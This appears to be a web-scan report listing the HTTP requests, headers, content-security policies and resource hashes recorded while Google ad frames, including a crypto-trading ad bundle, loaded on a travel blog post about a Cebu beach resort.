https://googleads.g.doubleclick.net/pagead/adview?ai=CjgcHS4tmYPi9AeGqlQe8u6qwDK_Yg_VhidDL89cNloLNhYgWEAEgxc-fE2CViriCyAegAercgNECyAEJqQJxPlAMeI6pPqgDAcgDSKoElQJP0J8odc57SDkxkHngzKDoRs8OB6kaeapJOmObvG80GQJsiBgNMGK197a8yhcyQ-d1PUII_9DOSIcP1q9px7xCxoeqg80K1aucyH-0ZnMRQFrkAQaR1pZMmmNJUzrKF6chuVLlrzBN28aGLeWYDkBgASkILUlg6HaanME3CJ4SNpM24DMHZvrCwgaUHHZaM5pfzCmHDduZ4WdORSy0OXLS8fJX2u701qvV4UuzxtACKbDVNu1PTmybp9-EXLBHiV28_ZGsFNY7ZyEpY9QmEZm1nebBpnYMChb222k3Q1OTyi8NqAVqRBxLwNpGWDAdncBsm1zBFr7Cu7jQrvvJlKe9qCKKfiyKFvH0gFAGjYR4eguvsvoNwATYjcSetAOSBQQIBBgBkgUECAUYBKAGLoAH_qL_rgGoB9XJG6gH8NkbqAfy2RuoB47OG6gHk9gbqAe6BqgH7paxAqgHpr4bqAfs1RvYBwDyBwQQqNwq0ggJCIDhgBAQARgfgAoByAsB2BMN0BUBgBcBshcaChgIABIUcHViLTY3NjE2MTE4ODAzNTEwNTM&sigh=nmHY6V-xMN8&template_id=419&tpd=AGWhJmvg-7IAWBuAq_I6f8t0uKSSYqt9nm2vtBahOdYx6KOhAA

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

Security Headers

Name	Value
Content-Security-Policy	script-src 'none'; object-src 'none'
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=600&slotname=9184309326&adk=3021105814&adf=3537862397&pi=t.ma~as.9184309326&w=254&fwrn=4&fwrnh=100&lmt=1617333067&rafmt=1&to=pso&psa=0&channel=WordPressSinglePost%2Bpso-lv-9&format=254x600&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=4&wgl=1&dt=1617333067000&bpp=1&bdt=1499&idt=1&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280%2C825x280%2C254x1313&nras=1&correlator=8191862741585&pv_ch=WordPressSinglePost%2B&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=1101&ady=2647&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&psts=AGkb-H9UrwTSQackQLSDI7eMpxKeHb0NSEm26uJiZM8xxUnxCPMz_l31AImRRR4aVxlVHXSo1MuK16vX_BPMNw%2CAGkb-H9OVp-hheL8SD1ARnWoTiEjvF2QAViDOvagSjEQtSj2LnrLKUdV4N5k8ToKLUQeoBcFVq_TU63z6A%2CAGkb-H9brB_acrGSAe_xTJMLlbMyuVfnbbrB0_KPjK3HS7AQACrHHlETZ4PSrcQ-Jz9E5RzBVBeurJQI6TlCGA%2CAGkb-H-IfgdzPLdq6K0S0RtP9FSu1T6F_4Sd3qHofNx5RHx8KwnZgia2z_3-4cFD1vbqyHkrVj8LH2Li8T4&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeEbr%7C&abl=CS&pfx=0&cms=2&fu=8320&bc=31&ifi=9&uci=a!9&btvi=4&fsb=1&xpc=e8LaLYVEMc&p=https%3A//www.itravelrox.com&dtd=6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

timing-allow-origin: *
content-security-policy: script-src 'none'; object-src 'none'
x-content-type-options: nosniff
server: cafe
date: Fri, 02 Apr 2021 03:11:07 GMT
p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
cross-origin-resource-policy: cross-origin
content-type: text/html; charset=UTF-8
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 0
x-xss-protection: 0

GET
H3-Q050 200 abg_lite_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/ Frame 7678 17 KB
7 KB 7ms
7ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/abg_lite_fy2019.js

Requested by

Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=600&slotname=9184309326&adk=3021105814&adf=3537862397&pi=t.ma~as.9184309326&w=254&fwrn=4&fwrnh=100&lmt=1617333067&rafmt=1&to=pso&psa=0&channel=WordPressSinglePost%2Bpso-lv-9&format=254x600&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=4&wgl=1&dt=1617333067000&bpp=1&bdt=1499&idt=1&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280%2C825x280%2C254x1313&nras=1&correlator=8191862741585&pv_ch=WordPressSinglePost%2B&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=1101&ady=2647&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&psts=AGkb-H9UrwTSQackQLSDI7eMpxKeHb0NSEm26uJiZM8xxUnxCPMz_l31AImRRR4aVxlVHXSo1MuK16vX_BPMNw%2CAGkb-H9OVp-hheL8SD1ARnWoTiEjvF2QAViDOvagSjEQtSj2LnrLKUdV4N5k8ToKLUQeoBcFVq_TU63z6A%2CAGkb-H9brB_acrGSAe_xTJMLlbMyuVfnbbrB0_KPjK3HS7AQACrHHlETZ4PSrcQ-Jz9E5RzBVBeurJQI6TlCGA%2CAGkb-H-IfgdzPLdq6K0S0RtP9FSu1T6F_4Sd3qHofNx5RHx8KwnZgia2z_3-4cFD1vbqyHkrVj8LH2Li8T4&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeEbr%7C&abl=CS&pfx=0&cms=2&fu=8320&bc=31&ifi=9&uci=a!9&btvi=4&fsb=1&xpc=e8LaLYVEMc&p=https%3A//www.itravelrox.com&dtd=6

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

b4e10c54a966ed5abeeac2aca4cfa968f317497770f59ec94af6d712db96e7d8

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:02:33 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 514
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 7115
x-xss-protection: 0
server: cafe
etag: 8094203328658613728
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 03:02:33 GMT

GET
H3-Q050 200 window_focus_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/ Frame 7678 2 KB
1 KB 7ms
7ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/window_focus_fy2019.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

731d7bd9ce2c95bf6af3d5719b995d714111949fb37b39919d45828875361233

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:01:36 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 571
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 1303
x-xss-protection: 0
server: cafe
etag: 14729628269804859526
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 03:01:36 GMT

GET
H3-Q050 200 rx_lidar.js Show response
www.googletagservices.com/activeview/js/current/ Frame 7678 118 KB
36 KB 14ms
13ms Script
text/javascript 2a00:1450:4001:813::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:813::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

8727cf8bd32a94a8d93d7c75469184dada14c6cadf02178c17db5ee06f832b0f

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:07 GMT
content-encoding: gzip
x-content-type-options: nosniff
server: sffe
etag: "1617218245166195"
vary: Accept-Encoding
content-type: text/javascript
cache-control: private, max-age=3000
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 36656
x-xss-protection: 0
expires: Fri, 02 Apr 2021 03:11:07 GMT

GET
H3-Q050 200 qs_click_protection_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/ Frame 7678 13 KB
6 KB 7ms
7ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/qs_click_protection_fy2019.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

c9581d69ef8a7435f061d76045cc929310f436366f9ced3b9b9811ca6ed26feb

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 01:43:25 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 5262
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 5599
x-xss-protection: 0
server: cafe
etag: 2241650964481140939
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 01:43:25 GMT

GET
H3-Q050 200 s Show response
googleads.g.doubleclick.net/pagead/drt/ Frame EA74 143 B
220 B 6ms
6ms Document
text/html 2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

safe /

Resource Hash

18088c10e79c926292732af98a0ce470e90f3fbcba4bb4896ab3310c2d94e421

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

:method: GET
:authority: googleads.g.doubleclick.net
:scheme: https
:path: /pagead/drt/s?v=r20120211
pragma: no-cache
cache-control: no-cache
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=600&slotname=9184309326&adk=3021105814&adf=3537862397&pi=t.ma~as.9184309326&w=254&fwrn=4&fwrnh=100&lmt=1617333067&rafmt=1&to=pso&psa=0&channel=WordPressSinglePost%2Bpso-lv-9&format=254x600&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=4&wgl=1&dt=1617333067000&bpp=1&bdt=1499&idt=1&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280%2C825x280%2C254x1313&nras=1&correlator=8191862741585&pv_ch=WordPressSinglePost%2B&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=1101&ady=2647&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&psts=AGkb-H9UrwTSQackQLSDI7eMpxKeHb0NSEm26uJiZM8xxUnxCPMz_l31AImRRR4aVxlVHXSo1MuK16vX_BPMNw%2CAGkb-H9OVp-hheL8SD1ARnWoTiEjvF2QAViDOvagSjEQtSj2LnrLKUdV4N5k8ToKLUQeoBcFVq_TU63z6A%2CAGkb-H9brB_acrGSAe_xTJMLlbMyuVfnbbrB0_KPjK3HS7AQACrHHlETZ4PSrcQ-Jz9E5RzBVBeurJQI6TlCGA%2CAGkb-H-IfgdzPLdq6K0S0RtP9FSu1T6F_4Sd3qHofNx5RHx8KwnZgia2z_3-4cFD1vbqyHkrVj8LH2Li8T4&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeEbr%7C&abl=CS&pfx=0&cms=2&fu=8320&bc=31&ifi=9&uci=a!9&btvi=4&fsb=1&xpc=e8LaLYVEMc&p=https%3A//www.itravelrox.com&dtd=6
accept-encoding: gzip, deflate, br
accept-language: en-US
cookie: IDE=AHWqTUnAq8mxK8feip4Ax6w6Jk030xHJVvdgTTzWV1YIKsFDLzH4dvmA3yH7JM-TweM
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=600&slotname=9184309326&adk=3021105814&adf=3537862397&pi=t.ma~as.9184309326&w=254&fwrn=4&fwrnh=100&lmt=1617333067&rafmt=1&to=pso&psa=0&channel=WordPressSinglePost%2Bpso-lv-9&format=254x600&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=4&wgl=1&dt=1617333067000&bpp=1&bdt=1499&idt=1&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280%2C825x280%2C254x1313&nras=1&correlator=8191862741585&pv_ch=WordPressSinglePost%2B&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=1101&ady=2647&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&psts=AGkb-H9UrwTSQackQLSDI7eMpxKeHb0NSEm26uJiZM8xxUnxCPMz_l31AImRRR4aVxlVHXSo1MuK16vX_BPMNw%2CAGkb-H9OVp-hheL8SD1ARnWoTiEjvF2QAViDOvagSjEQtSj2LnrLKUdV4N5k8ToKLUQeoBcFVq_TU63z6A%2CAGkb-H9brB_acrGSAe_xTJMLlbMyuVfnbbrB0_KPjK3HS7AQACrHHlETZ4PSrcQ-Jz9E5RzBVBeurJQI6TlCGA%2CAGkb-H-IfgdzPLdq6K0S0RtP9FSu1T6F_4Sd3qHofNx5RHx8KwnZgia2z_3-4cFD1vbqyHkrVj8LH2Li8T4&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeEbr%7C&abl=CS&pfx=0&cms=2&fu=8320&bc=31&ifi=9&uci=a!9&btvi=4&fsb=1&xpc=e8LaLYVEMc&p=https%3A//www.itravelrox.com&dtd=6

Response headers

content-type: text/html; charset=UTF-8
x-content-type-options: nosniff
content-encoding: gzip
date: Fri, 02 Apr 2021 02:23:20 GMT
server: safe
content-length: 145
x-xss-protection: 0
cache-control: public, max-age=3600
age: 2867
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"

POST
H3-Q050 204 gen_csp
pagead2.googlesyndication.com/pagead/ Frame 7678 0
48 B 15ms
15ms Other
image/gif 2a00:1450:4001:812::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://pagead2.googlesyndication.com/pagead/gen_csp?id=adbundle&qqi=CLiPxpfL3u8CFWFV5QodvJ0Kxg&gqi=S4tmYOZ82d3uA_HussgP&layout=/sadbundle/%24csp%253Der3%24/1910213355410914744/300x600_Crypto3_CYSEC/300x600_Crypto3_CYSEC.html

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:812::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
Content-Type: application/csp-report

Response headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:07 GMT
x-content-type-options: nosniff
server: cafe
timing-allow-origin: *
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cache-control: no-cache, must-revalidate
cross-origin-resource-policy: cross-origin
content-type: image/gif
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 0
x-xss-protection: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

GET
DATA 200
OK truncated
/ Frame 7678 210 B
0 Image
image/png

General

Check archive.org

Show headers Download Go to Show image

Full URL: data:truncated
Protocol: DATA
Server: -, , ASN (),
Reverse DNS
Software: /
Resource Hash: 2af7341f26429b5947a99cd6f1ba11b6a6b664ac16eba4807a2705fac9ea5210

Request headers

Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

Content-Type: image/png

GET
H3-Q050 200 exitapi-impl.js Show response
tpc.googlesyndication.com/pagead/gadgets/html5/api/ Frame E334 9 KB
3 KB 6ms
6ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/gadgets/html5/api/exitapi-impl.js

Requested by

Host: tpc.googlesyndication.com
URL: https://tpc.googlesyndication.com/sadbundle/$csp%3Der3$/1910213355410914744/300x600_Crypto3_CYSEC/300x600_Crypto3_CYSEC.html

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

d661244532ddce6a92fb96fde511e23ea4de69ff2e41a5bffb884caa71166e01

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 04:49:22 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 80505
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 3271
x-xss-protection: 0
server: cafe
etag: 7483759447172721109
vary: Accept-Encoding
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=86400
timing-allow-origin: *
expires: Fri, 02 Apr 2021 04:49:22 GMT

GET
H3-Q050 200 addata.js Show response
tpc.googlesyndication.com/pagead/gadgets/html5/ Frame E334 22 KB
9 KB 7ms
6ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/gadgets/html5/addata.js

Requested by

Host: tpc.googlesyndication.com
URL: https://tpc.googlesyndication.com/sadbundle/$csp%3Der3$/1910213355410914744/300x600_Crypto3_CYSEC/300x600_Crypto3_CYSEC.html

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

4634b94630896f1a23c5ce01f743d720847c5f4dd28fb549ed503cb2df4f8e87

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 13:07:30 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 50617
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 8867
x-xss-protection: 0
server: cafe
etag: 18043545750443934562
vary: Accept-Encoding
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=86400
timing-allow-origin: *
expires: Fri, 02 Apr 2021 13:07:30 GMT

GET
H3-Q050 200 createjs-2015.11.26.min.js Show response
tpc.googlesyndication.com/sadbundle/$csp%3Der3$/1910213355410914744/300x600_Crypto3_CYSEC/libs/ Frame E334 186 KB
50 KB 8ms
7ms Script
application/x-javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/sadbundle/$csp%3Der3$/1910213355410914744/300x600_Crypto3_CYSEC/libs/createjs-2015.11.26.min.js

Requested by

Host: tpc.googlesyndication.com
URL: https://tpc.googlesyndication.com/sadbundle/$csp%3Der3$/1910213355410914744/300x600_Crypto3_CYSEC/300x600_Crypto3_CYSEC.html

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

60f05d358e0777fa5948d114025fac40231d57ee6e877d44c3629518927a5091

Security Headers

Name	Value
Content-Security-Policy	default-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; script-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://s0.2mdn.net/ads/studio/cached_libs/ https://storage.googleapis.com/vr-assets-static/test_ads/GMAPlayable/ https://www.gstatic.com/ads/ci/ https://www.gstatic.com/swiffy/; object-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; style-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://fonts.googleapis.com; img-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com blob: data: https://.ggpht.com https://.gstatic.cn https://*.gstatic.com https://ajax.googleapis.com/ajax/ https://lh3.googleusercontent.com https://lh4.googleusercontent.com https://lh5.googleusercontent.com https://lh6.googleusercontent.com https://s0.2mdn.net/ads/studio/cached_libs/ https://static.doubleclick.net https://vr.google.com/shaders/w/techspecs/; media-src 'none'; frame-src 'unsafe-inline' javascript:; font-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com data: https://fonts.gstatic.com; connect-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com https://csi.gstatic.com/csi https://fonts.googleapis.com/css https://fonts.googleapis.com/css2 https://vr.google.com/shaders/w/techspecs/; report-uri /pagead/gen_csp?id=adbundle; child-src 'unsafe-inline' javascript:; form-action 'none'
